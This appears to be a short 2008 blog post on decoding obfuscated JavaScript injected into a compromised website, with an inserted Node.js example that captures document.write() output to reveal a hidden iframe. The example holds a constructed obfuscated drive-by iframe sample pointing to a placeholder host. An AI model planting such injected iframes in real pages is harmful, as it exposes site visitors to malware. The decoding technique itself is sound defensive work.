Deciphering Obfuscated JavaScript
- December 24th, 2008
I had a client who needed me to verify if a site he was hosting had indeed been hacked. The site had several obfuscated lines of JavaScript throughout most if not all of the pages of the site.
I was able to confirm the site was compromised without running the code on a VM or chancing it with NoScript on my machine by replacing all document.write() calls with alert().
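The same idea, taken one step further, as an added example that is not from the original post: instead of swapping in alert(), run the obfuscated script against a fake document whose write() only records its arguments, so the injected markup is revealed without ever being rendered or fetched. The obfuscated sample and the .invalid hostname are constructed for the example.

```javascript
// Added example: replace document.write() with a capture sink so an
// obfuscated script reveals what it would inject, without the markup
// ever being rendered or fetched. Runs under Node.js; no browser needed.

// Constructed sample in the style of the injected snippet: the iframe tag
// is hidden behind unescape() and a charCode loop. The host is a placeholder.
const SAMPLE_SCRIPT = `
  var p = "%3Ciframe%20src%3D%22http%3A//malicious.invalid/in.php%22%20";
  var q = [119,105,100,116,104,61,49,32,104,101,105,103,104,116,61,49];
  var s = unescape(p);
  for (var i = 0; i < q.length; i++) s += String.fromCharCode(q[i]);
  document.write(s + "></iframe>");
`;

// Run the script with a fake document whose write()/writeln() only record
// their arguments. window.location is stubbed so a redirect attempt ends up
// as a property change on the stub instead of navigating anywhere.
function captureWrites(script) {
  const writes = [];
  const fakeDocument = {
    write: (...args) => { writes.push(args.join('')); },
    writeln: (...args) => { writes.push(args.join('') + '\n'); },
  };
  const fakeWindow = { document: fakeDocument, location: { href: 'about:blank' } };
  // A direct eval() inside the body still resolves `document` to this parameter.
  const run = new Function('window', 'document', script);
  run(fakeWindow, fakeDocument);
  return writes;
}

// Pull the opening <iframe>/<script>/<object>/<embed> tags out of the captured
// markup so the injected elements stand out at a glance.
function findInjectedTags(markup) {
  const re = /<(iframe|script|object|embed)\b[^>]*>/gi;
  return markup.match(re) || [];
}

// Decode a suspicious snippet and return both the raw markup and the tags found.
function analyze(script) {
  const markup = captureWrites(script).join('');
  return { markup, tags: findInjectedTags(markup) };
}

console.log(analyze(SAMPLE_SCRIPT).tags);
```

Scripts that reach for other DOM APIs will throw against the bare stub; add the missing property to fakeDocument and rerun rather than loosening the sandbox.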
Just as expected there was a nice iframe. Using wget I then confirmed that the iframe redirected to another iframe which redirected to a payload. The same network delivering the payload had also uploaded the modified files via FTP a few days earlier.
Since I found no cracking attempts on the site's FTP account, I'm thinking the client's client machine is part of the happy botnet.
This is the first time I've run into an encrypted iframe and thought it was interesting.